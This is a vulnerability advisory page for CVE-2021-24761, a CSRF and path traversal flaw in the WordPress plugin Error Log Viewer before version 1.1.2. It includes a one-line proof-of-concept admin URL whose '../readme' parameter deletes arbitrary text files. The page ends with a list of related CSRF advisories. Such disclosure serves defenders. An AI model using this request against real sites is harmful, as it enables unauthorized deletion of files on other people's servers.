Error Log Viewer < 1.1.2 – Arbitrary Text File Deletion via CSRF | CVE 2021-24761 | Plugin Vulnerabilities

Description

The plugin does not perform nonce check when deleting a log file and does not have path traversal prevention, which could allow attackers to make a logged in admin delete arbitrary text files on the web server.

Proof of Concept

On Web Servers other than Windows, the /wp-content/plugins/error-log-viewer/saved_logs/ folder must exist for the attack to be successful, on Windows ones, there is no need for it

To delete the readme.txt of the plugin: https://example.com/wp-admin/admin.php?page=rrrlgvwr-monitor.php&saved_logs_action=delete&rrrlgvwr_check_del=../readme

Affects Plugins

error-log-viewer

Fixed in 1.1.2

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

c14e1ba6-fc00-4150-b541-0d6740fee4d2

Timeline

Publicly Published

2021-12-29 (about 3 years ago)

Added

2021-12-29 (about 3 years ago)

Last Updated

2022-04-13 (about 3 years ago)

Other

Published

Title

Published

2014-08-01

Title

Developer Formatter 2013.0.1.40 - devformatter.php Multiple Action CSRF

Published

2023-10-25

Title

DeepL Pro API translation < 2.4.1.2 - Log Pruning via CSRF

Published

2025-03-26

Title

Football Pool < 2.12.3 - Cross-Site Request Forgery to Settings Update

Published

2025-04-22

Title

CM Ad Changer < 2.0.6 - Cross-Site Request Forgery

Published

2014-08-01

Title

Polldaddy Polls & Ratings 2.0.20 - Cross-Site Request Forgery